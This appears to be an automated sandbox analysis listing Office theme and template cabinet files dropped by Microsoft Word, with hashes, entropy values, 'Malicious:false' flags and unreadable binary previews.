                                                                                                                                                                                                                                                                                                                                                                          Preview:MSCF....].......D...........................]....?..........{.......................rings.glox.................Content.inf..|^.....[......P........<.$.."..0R..xa.Ax#B..d... ....K,.....^.H.....H.........&.j.\f.. ..,....,..!k..R..e..!...E...........................><.RB.....~h...........Q................g..M|,...x.....qV7.u..\...F-N.{-..X..&Zig.~..{.A.p.Z...X..{,-n............`$.%.ND.....>].6cvZ.%d..*a.$..-.K.Hf....L..;.#...H....U,........P.@.*-$C.,.g...%YJE..$.jP........b...Y<..[U...MF]F.K...1... x.}3w.o.#,.}T.....w5+...=.=...c.F^....OM.=.......G_{n.*...WC.w!......{/.~.}..s..6_......)..Xy...4.....<..XZJ........#~._i....%..fM.V.?.q...q.....7...B..sVt...(.:..c....~.e...kGZ...C..(J..o...`...?.)-.T.l....&...gR.$.....g.:...2.e%F.....x....z0...K..a8B...........D..]....7....~.".DR...r)...}b)e.>.\h~f...(}.c........Q...o5H.........C.KC.(.L.l................R..a.pg{..\.......-b........}.C......qTS..%..r.lG..Q.1..Z.>a.D...tC..LV...Rs.C.M18x.:......%O.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, many, 6196 bytes, 2 files, at 0x44 "ThemePictureGrid.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):22340
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.668619892503165
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:384:GByvLdFHny7G8E0GftpBjE8upFLrHRN778lvQyUTL2mm2y:Oy3HkG8Pi6887mvU+ma
                                                                                                                                                                                                                                                                                                                                                                          MD5:8B29FAB506FD65C21C9CD6FE6BBBC146
                                                                                                                                                                                                                                                                                                                                                                          SHA1:CE1B8A57BB3C682F6A0AFC32955DAFD360720FDF
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:773AC516C9B9B28058128EC9BE099F817F3F90211AC70DC68077599929683D6F
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:AFA82CCBC0AEF9FAE4E728E4212E9C6EB2396D7330CCBE57F8979377D336B4DACF4F3BF835D04ABCEBCDB824B9A9147B4A7B5F12B8ADDADF42AB2C34A7450ADE
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:MSCF....4.......D...........................4....?..................1...............ThemePictureGrid.glox.....1...........Content.inf....K..5.[.... V.q......B.....?.h.i.J.D...Z...>.....i~...A...Z....H.hy.D..X.....>...L.I..`. z w0}.K`.C{h....W\../.U..p\%...B...;............9..8.^M.....].lP.p...|..?..M....E..S.`..-n........Q'.'.o..C}=..?`.bQ...J"0f.. ....k3n..F.Pu..#...w].`<...."D.].-.#+):..fe..=<.M...4..s.q.f._.=.*T.M..U.[R.kbw.,......t6_I...~.X..$_.q....}2..BR...).[...<.l.3........h%....2.$`>..hG...0.6.S......._3.d~1.c.2g....7tTO..F.D.f.Y..WCG.B..T....Gg&.U'....u.S/......&6w..[bc.4....R.e..f.,....l."........I....J.=~...$x.&2...+,-.;.v.'.AQ.fc...v._..rZ..TYR...g?..Z..!.3mP dj...../...+...q.....>..../...]P.z?DW&.p..GZ....R5n......,..]{].0m.9...o.{...e."...8VH....w"%;.g\.K..p.}....#r.u..l.vS...Y.7U.N*-E@.....~....E...x.....C.......{NP....5Ymk.*._.K...Z...f..;.......b.....,._@B..\.S..d.'\rs..].}.5"XJU.J..'.zk}.+P.)C.X.?9sx.D....(K....P^N_D...Z.........
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, many, 5731 bytes, 2 files, at 0x44 "ThemePictureAlternatingAccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):21875
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.6559132103953305
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:384:k73HRpZA6B3ulrnxtRT7G8E0GftpBjEdHqlFLrHRN7uhFlvQyUTL2m4c:k7XRgIkrG8Pi6dmuNvU+mp
                                                                                                                                                                                                                                                                                                                                                                          MD5:E532038762503FFA1371DF03FA2E222D
                                                                                                                                                                                                                                                                                                                                                                          SHA1:F343B559AE21DAEF06CBCD8B2B3695DE1B1A46F0
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:5C70DD1551EB8B9B13EFAFEEAF70F08B307E110CAEE75AD9908A6A42BBCCB07E
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:E0712B481F1991256A01C3D02ED56645F61AA46EB5DE47E5D64D5ECD20052CDA0EE7D38208B5EE982971CCA59F2717B7CAE4DFCF235B779215E7613AA5DCD976
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:MSCF....c.......D...........................c....?..................................ThemePictureAlternatingAccent.glox.................Content.inf...3.....[.... .qq...........\<.^......o."......f.o...x.{..q..^.MH^...........{0.K....4pX.i...@6A4X.P.01d....'p.......zA.......... .......7.......a. `.=!@- ......>G.s.k~@.a.lfha:m....1...@.,G`....{....W..N..qs.......j.+TrsT.l.9..L...1+...d..-u..-.......).#u&...3......k.&C...DdZ.'.......8..<PF..r.eq.X6...u..v...s5.m.Q.l.G%.<.]....RV<...S..Dv..s.r.......dh.N.3-.Hf'.....3.GZ..E.kt.5......h...|...?!.L....~.)..v....:2.../F.,....o.qi.i7..E.|.mh.R_.@A.FO@i.....Feo...x.l...{E.\W9|V...=#..3..(......tP.:i....Ox.U.N...%6...p.6&.....<zh.z.|.<Z.?.k....y7m...F.Z$-.:.l.h...{T..7....?..T...d,r...z?../...`/Z......a.v@)....u......V..v.:.._.|.'..[..O.s.OAt-."b.In"..I...J*.~H.:-...?..uV....dZ;z:.l.{.E.,.Q..i]:.0r.I.y..f...../j.wN...^R.....u....>..}....f.f...]A..C~;/....%..^#..N.a..........99.....`.....%..iS....S......$....)
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, many, 3144 bytes, 2 files, at 0x44 "VaryingWidthList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):19288
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.570850633867256
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:384:5ZII4Hf+7G8E0GftpBjCwBFLrHRN7bcClvQyUTL2mH:pG8PicgbcAvU+mH
                                                                                                                                                                                                                                                                                                                                                                          MD5:B9A6FF715719EE9DE16421AB983CA745
                                                                                                                                                                                                                                                                                                                                                                          SHA1:6B3F68B224020CD4BF142D7EDAAEC6B471870358
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:E3BE3F1E341C0FA5E9CB79E2739CF0565C6EA6C189EA3E53ACF04320459A7070
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:062A765AC4602DB64D0504B79BE7380C14C143091A09F98A5E03E18747B2166BD862CE7EF55403D27B54CEB397D95BFAE3195C15D5516786FEBDAC6CD5FBF9CD
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:MSCF....H.......D...........................H....?..................................VaryingWidthList.glox.................Content.inf...O.....[.... v.q......R.....>.%i.I.HhD.V...qt.....'....N...!..aw$(J.%(..A..h......l|.D.p9`..Y09.:.u....p. :,.*.YD=0.p. ......w.........*..<..;.....u.."......7[....8.....?^........-..;q.|.....B....PJ....r.K#.#.0'...}.........+gpR...T....5.iu.^I...A\..gK....}..z.B.nT.../.m.......N....E'1.E.\..o.....W..R.#.#...8.7...R.SbW-...%......$.obj.F..W_@....sY!........s.O..."k. ..b....j....v...P.\....7d...|"J.T...2p..m.&..r..,2.).....X.`...xt].U...b.h..V.....|L..N.Z.O#....o...1R.w30.g..?;..C.T.:$..MGY.C"i\.f..#..<.k...m..s.w. ..Ga].....wt.h|.Ta<.......(SO.]9.%a..Z... r._JH.=O...P.9a.v.....Kj.".T...m...4.?...F...$...y.....hbW.UA..u.&)....py.C{.=t.....n...}|H3A9.=..W..JJ..y./Y.E.M9..Z..w. .HB.YoIi..i.e..9;n...SpHw,....f....d>..g.m..z...... ...f...KP.M..U.....~vFD.fQ.P?......2!.n.....`@C!G...XI.].s,.X.'...u.E.o..f
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, many, 291188 bytes, 2 files, at 0x44 +A "Banded.thmx" +A "content.inf", flags 0x4, ID 56338, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):307348
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.996451393909308
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:7vH3uG+yiWx0eVJyORloyyDqnHefzOs81MrXLXx7:b36yiWH/LRS2CJl1
                                                                                                                                                                                                                                                                                                                                                                          MD5:0EBC45AA0E67CC435D0745438371F948
                                                                                                                                                                                                                                                                                                                                                                          SHA1:5584210C4A8B04F9C78F703734387391D6B5B347
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:3744BFA286CFCFF46E51E6A68823A23F55416CD6619156B5929FED1F7778F1C7
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:31761037C723C515C1A9A404E235FE0B412222CB239B86162D17763565D0CCB010397376FB9B61B38A6AEBDD5E6857FD8383045F924AF8A83F2C9B9AF6B81407
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:MSCF....tq......D...........................tq.. ?..........|..................Mn. .Banded.thmx............Mn. .content.inf..;.u.i..[...............?....^.j.{j.B...$M/!...W....{!..^0x/.6...&............w......$.B..J.?a.$=...P..L...d..........+./.\..E:h.....-.$..u-.I..L\.M.r..Y..:rtX:....8...........+8.}{......&.-..f.f..s3-P.''.r...Z-"/E../...^%^N(,.$..$.H..O........q>...|.|......y..m.)u....`.....z.n..-.[.5....xL....M...O..3uCX..=4.....7.yh...dg.;..c.x.4..6..e..p.e"..,.!.St{..E..^I.9j....;..`.Y..#.0..f...G.....9~./....QCz.93..u%hz.........t9.""........)..7K.c~E!..x.E.p...[......o..O.j.c.......6.t{...".....t9V;xv....n<.F.S2.gI.#6...u..O..F.9.[.L.....K....#..zL..I...o....k...qog.......V..BKM..#.bET.)..&4..m.w...*....E.a[.Q.y.B...w...r.nd...)...<..#..r[4.y...#.z.....m?.2K.^...R{..m..f......r?]..>@...ra$...C+..l].9...."..rM9=......]".'...b&2e...y..a..4....ML..f...f"..l..&.Rv=2LL..4...3t_x...G....w..I.K....s.t.....).......{ur.y2...O3.K*f.*P(..F..-.y.Z...
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, many, 704319 bytes, 2 files, at 0x44 +A "content.inf" +A "Wood_Type.thmx", flags 0x4, ID 5778, number 1, extra bytes 20 in head, 51 datablocks, 0x1503 compression
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):723359
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.997550445816903
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:12288:NPnBZX7wR3tMwYqNDQGnXTtfzO5U7yo6O7bLhe8yE3LLDok4a:JBMbYE7xzO5U917bLh/DL3oJa
                                                                                                                                                                                                                                                                                                                                                                          MD5:748A53C6BDD5CE97BD54A76C7A334286
                                                                                                                                                                                                                                                                                                                                                                          SHA1:7DD9EEDB13AC187E375AD70F0622518662C61D9F
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:9AF92B1671772E8E781B58217DAB481F0AFBCF646DE36BC1BFFC7D411D14E351
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:EC8601D1A0DBD5D79C67AF2E90FAD44BBC0B890412842BF69065A2C7CB16C12B1C5FF594135C7B67B830779645801DA20C9BE8D629B6AD8A3BA656E0598F0540
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:MSCF....?.......D...........................?...`J..............3..............M.. .content.inf..+.........M.. .Wood_Type.thmx......r..[.........................!.wwwwqwwwwwwwwwww..."....+......nR..x..\..w..r.5R.....(|.>.$e3.!..g....f..`9NL......o./.O.bxI...7.....|........6.n."J.....4^g.........?...................o.......s3.....8. .T.j...._.Z.Q.t.k,(o.c.t.......?Z....`o........?.a....6.)....6b..../.t...........Mz....q}......C.......+{.......o...K.tQjt............7.._....O.....\....` ..............@..`....%..t....V.]........m..m....u..1.yr;..t..F.'..+{....zqvd.g._..$H..Vl...m..../....g..rG.....:*......8....h...[...a06...U.W....5.Z.W..1I..#.2.....B3...x....$PRh...\{J.c.v.y..5+Y.W.N..hG......<..F..W.d8_....c...g....p|7.]..^.o.H.[$Zj..{4......m.KZ..n.T%...4.Z..Y."q7?kuB......U....).~.......W%..!.e.U.mp.o...h...?.w...T.s.YG#......Y.}....Z.O.i.r,...n..4.\....P..m..=....f........v....g....j...*.wP..4.VK.y.z...C..oum.b.1......?.Z.>.7.!?......A..Q>..Z....-
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, many, 26644 bytes, 2 files, at 0x4c "Element design set.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):42788
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.89307894056
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:768:Hx+UzBiwDQTXgBm029ClGn4BZz6i5kIew/jG8Pi6lYJz1gH:0ZXc29eGn2n5klwjxP7l2z1gH
                                                                                                                                                                                                                                                                                                                                                                          MD5:21A4B7B71631C2CCDA5FBBA63751F0D2
                                                                                                                                                                                                                                                                                                                                                                          SHA1:DE65DC641D188062EF9385CC573B070AAA8BDD28
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:AE0C5A2C8377DBA613C576B1FF73F01AE8EF4A3A4A10B078B5752FB712B3776C
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:075A9E95C6EC7E358EA8942CF55EFB72AC797DEE1F1FFCD27AD60472ED38A76048D356638EF6EAC22106F94AFEE9D543B502D5E80B964471FA7419D288867D5D
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:MSCF.....h......L............................h...?..................@g......o...............Element design set.dotx.................Content.inf.Y/..Re..[......f........,..]....D.],....]..X.......XC4pE.....p........2..u;L.N.....]G..d.^d.$).e.=..;..Kb.../.../....H.."...w$._I..5.....a..4.Gd5p......v.8..1..%H..\..e...3.e..A..).d*.. . (.8.".......(>..<...@...~*v&.f..LWhqk]+Uep.d..%...o.....k.......e...nNN.&_.>.d.?H`"...r?..Z.p..q..<M.N.t....{*.y]#...._XW"qI...x.......}.. .N...;.}:..m8...[.r.F....^?...o...u..*...J3.V....~...~tn#.Kf6.s.|*..,s...M.$.f..?Yu.pE.1_wU...%....._..'..Z......y:.{.J5..7..Q.w}/.~.-3~Ctw=..IT.....mI.u@...y.M....2.%...y...Y..j.k<-.Q.r...7m..b...+.6..|.....U..}[...,....^....5..D..qW...[3).p.Y<.Hh..t...%cw=Z..W.~W.F....zr.4.g...O...P.g_^..3.-............3s...S..y...u...N...EsJz....tT../..c[w{cG....../6.....:.W<d5}.q..s..K"$........Ne..5..#.v'..n4.rj....Fc=....5..VN.....6..9`....|..........WX..-?..........W.)^`1.......].R2..s6...H.......
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, many, 259074 bytes, 2 files, at 0x44 +A "content.inf" +A "Dividend.thmx", flags 0x4, ID 58359, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):276650
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.995561338730199
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:H2a+HFkDF8gpmMt4kzwVVqhSYO6DITxPWgJl1CFExwXyo7N:mlZgFtIVVTuDExeWuv7N
                                                                                                                                                                                                                                                                                                                                                                          MD5:84D8F3848E7424CBE3801F9570E05018
                                                                                                                                                                                                                                                                                                                                                                          SHA1:71D7F2621DA8B295CE6885F8C7C81016D583C6B1
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:B4BC3CD34BD328AAF68289CC0ED4D5CF8167F1EE1D7BE20232ED4747FF96A80A
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:E27873BFD95E464CB58B3855F2DA404858B935530CF74C7F86FF8B3FC3086C2FAEA09FA479F0CA7B04D87595ED8C4D07D104426FF92DFB31BED405FA7A017DA8
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:MSCF............D................................D..........~..................M. .content.inf............M. .Dividend.thmx..).}.b..[.....`.........?.R...T../..............4..yy....{...f.h..\U......sy.gV0Q.@..A..@..3a.A}........7.q.......8......R....sJ)E..ENr.S*B.1..).s.r.J.D.b."..........(.....E$.V........y.5.L....;gY..QK/nni..x..3.<..Q.Q..K.I.....T.z.,F.....{.p.....;8._.&../...........X...}.;[Gk..._.i`m.u.?...s.w...4.....m......l....5..n.?..c..m...,.....{.k.?......sC.............e..1....oL.8./......1._.K:.]..&......O............qo.....Dd/c...6.q.*......V.v........h....L..h..C+..V..;O.(7Z]{I%....S3.{h....\...b.......5.ES......Z.4...o.c`..YA....9i....M.s....Z3.oq`....>.i..@.@n.a...x.3.zp.<....vU/.|^CvE...aD.P&mhvM>.p..B~....."._.......v-.m..w..?._..=...:...k....i.}x.6....Y.i..n....h...j......LZ.....fk..f0.y.T..Vl.;...s.......B6.f.'z.c.\W?...4U)..aJ.;O....L.d7.J.V#Q.....\J.F.?].d}!..y].6..%..~....|......5...'N.#.....t6.,.E.O."..0fyz....
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, many, 279287 bytes, 2 files, at 0x44 +A "Basis.thmx" +A "content.inf", flags 0x4, ID 55632, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):295527
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.996203550147553
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:nwVaEqsf23c9shf6UyOGgDWDn/p3fd+zkPWnvGL3n9bQnkmVheyqtkl:MlPfW6sVEDn/pPdhWnvGL36zyyqal
                                                                                                                                                                                                                                                                                                                                                                          MD5:9A07035EF802BF89F6ED254D0DB02AB0
                                                                                                                                                                                                                                                                                                                                                                          SHA1:9A48C1962B5CF1EE37FEEC861A5B51CE11091E78
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:6CB03CEBAB2C28BF5318B13EEEE49FBED8DCEDAF771DE78126D1BFE9BD81C674
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:BE13D6D88C68FA16390B04130838D69CDB6169DC16AF0E198C905B22C25B345C541F8FCCD4690D88BE89383C19943B34EDC67793F5EB90A97CD6F6ECCB757F87
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:MSCF.....B......D...............P............B..p?..........{.................M.. .Basis.thmx...........M.. .content.inf.`g..td..[...............5..$..WM.....R.......H\.+\./^...x.^..h..MU..\........v........+......g...$.......g.....~....U].7..T..1k.H...1...c.P.rp.6K..&......,.............U4.WoG.w.....;.....v..922.;]..5_-]..%E]b..5]... (..H..II..ttA4Q..BI!|...H.7J.2D....R.......CXhi`n....6..G.~&.[..N...v..Z"t.a..K..3..).w...._@.}.}.v.......4......h....R;.8.c&.F...B^....Q.....!Bm2...F.`.......M;...#.{....c...?...e...6t..C.-.E.V.v%I..H.....m.n...$D.....vU'.....=6}~...Gw...Y..?.@......G.....k......z...5d.h......1.}..O*;e..t......Y.0...3.v).X.-.2.....~....14.[.w=I....hN....eD..7G.u.z..7.do..!....d..o.wQ.:....@/.^..<e.-..=\.....6.C.'.rW$..Cp.M3.u6z......Q.F.9.5....juc..I...m4]7L....+n......).t......2[.3.p.:.....O5y..wA........^..!..H....{..S.3w.!&.'.;...(..|m.x.S..Z.j..3...n..WU...../w.......xe=.+.D...x..qy.S.....E..... ...uu.`.,..<.6[p
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, many, 252241 bytes, 2 files, at 0x44 +A "content.inf" +A "Frame.thmx", flags 0x4, ID 34169, number 1, extra bytes 20 in head, 16 datablocks, 0x1503 compression
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):271273
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.995547668305345
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:zfdvQnJMwXse4Vradf3mrC7woyWbjKlCVC7K:zfJwJse4VrS1AK
                                                                                                                                                                                                                                                                                                                                                                          MD5:21437897C9B88AC2CB2BB2FEF922D191
                                                                                                                                                                                                                                                                                                                                                                          SHA1:0CAD3D026AF2270013F67E43CB44F0568013162D
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:372572DCBAD590F64F5D18727757CBDF9366DDE90955C79A0FCC9F536DAB0384
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:A74DA3775C19A7AF4A689FA4D920E416AB9F40A8BDA82CCF651DDB3EACBC5E932A120ABF55F855474CEBED0B0082F45D091E211AAEA6460424BFD23C2A445CC7
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:MSCF....Q.......D...............y...........Q...XJ..........{..................M.. .content.inf.(..........M.. .Frame.thmx.1....b..[.........B.....6....ZZ}....BH..-D..}..V.V-........Z..O.....H.f..........;..@d.`......!..=;.,bp..K.q....s.y....D.qZ)p......D...r.S....s=B.4.).8B....4.a6 ...~........."....#.....}....n.Q.1cH.%c/.U....E..E...!..Da*.p....X..G..:.....1.@.....W.'...._........W.c...<.v.k.....&.8......?.h.>d._:-.X.......9..tL}........3.;.N3.D~......>.^?..|:...}......oT.z.......w..[..}:...._fu........Kk.......L..9..p..e..^......K.%...Mapqhvv..E&.^.....[...9|"l...9...U......!..w..Nya...~C.yx...w.K..q.z.j.W?t.......DY.x.S2.....]..na.Qj...X.K..^...S.hK.W...Z....s.0...NF...8C.......j.'Zc...k.%...l....S.....OW..o.Qf.x...X.;<.rO].....W.m.e....T.1.6........".....Q.3........l..v.."..I...&......w..4vE...c.s[.3.m..8.q$.....a...)...&:6..,..#..?....;.!.....~.UP.r=.}h.&U......X...]..X.e\u.G<....E....lG.@.*Z...10.D@.]....z+-.S....p..Y.PK.:.S..p.....1E`..-
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, many, 243642 bytes, 2 files, at 0x44 +A "content.inf" +A "Metropolitan.thmx", flags 0x4, ID 19054, number 1, extra bytes 20 in head, 24 datablocks, 0x1503 compression
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):261258
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.99541965268665
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:9blShNYrHNn0JU+D+kh8CIjXHWC7X0nZLC9Ge2KY/WfI:9ZSTYrtn0Sk+CIDHWC7chVKYx
                                                                                                                                                                                                                                                                                                                                                                          MD5:65828DC7BE8BA1CE61AD7142252ACC54
                                                                                                                                                                                                                                                                                                                                                                          SHA1:538B186EAF960A076474A64F508B6C47B7699DD3
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:849E2E915AA61E2F831E54F337A745A5946467D539CCBD0214B4742F4E7E94FF
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:8C129F26F77B4E73BF02DE8F9A9F432BB7E632EE4ABAD560A331C2A12DA9EF5840D737BFC1CE24FDCBB7EF39F30F98A00DD17F42C51216F37D0D237145B8DE15
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:MSCF............D...............nJ...............D.................."..........M. .content.inf....."......M. .Metropolitan.thmx...cVtP..[.....`Q..B.....=.T.....h.."...Z..|..}hZK.V....Z..Z................?..v...[S$."...H......^u.%.@...>....... f.........1.5......*&lm.tZ.msz:...Noc....1....D .........b..... ..3#pVp....}oo]{m......H*[%i.GNHB1D<......(*# ....H"....DP..b(B.<.....v......_..`.7..;.}............/.p}.:vp....~l0..].........S....G?.....}..U.;......dNi..?........-c..J.z....Z...._.O.....C..o.,......z....F....sOs$..w9......2G..:@...'....=.....M..am.....S......(`.._....'......[..K"....BD...D...^1k.....xi...Gt....{k@.W.....AZ+(,...+..o......I.+.....D..b. T.:..{..v.....g..........L.H.`...uU~C.d...{...4.N.N..m8..v.7..3.`.....,...W...s.;.fo.8.Y...2.i...T&.-...v8..v.U.Y=...8..F.hk..E.PlI.t.8......A.R....+.]lOei..2...... gS*.......%8H.....<.U.D..s.....>.....D_...../....l.......5O1S~.........B.g.++cV.z.f .R.Z.......@6....(..t^5"...#G...
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, many, 206792 bytes, 2 files, at 0x44 +A "content.inf" +A "View.thmx", flags 0x4, ID 33885, number 1, extra bytes 20 in head, 15 datablocks, 0x1503 compression
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):222992
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.994458910952451
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:k8/c2cF9GTLqsTmYstUdx+dwb2ooiVOfiI17zWbQ:jbzqGdpbZ/Mf3h68
                                                                                                                                                                                                                                                                                                                                                                          MD5:26BEAB9CCEAFE4FBF0B7C0362681A9D2
                                                                                                                                                                                                                                                                                                                                                                          SHA1:F63DD970040CA9F6CFCF5793FF7D4F1F4A69C601
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:217EC1B6E00A24583B166026DEC480D447FB564CF3BCA81984684648C272F767
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:2BBEA62360E21E179014045EE95C7B330A086014F582439903F960375CA7E9C0CF5C0D5BB24E94279362965CA9D6A37E6AAA6A7C5969FC1970F6C50876582BE1
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
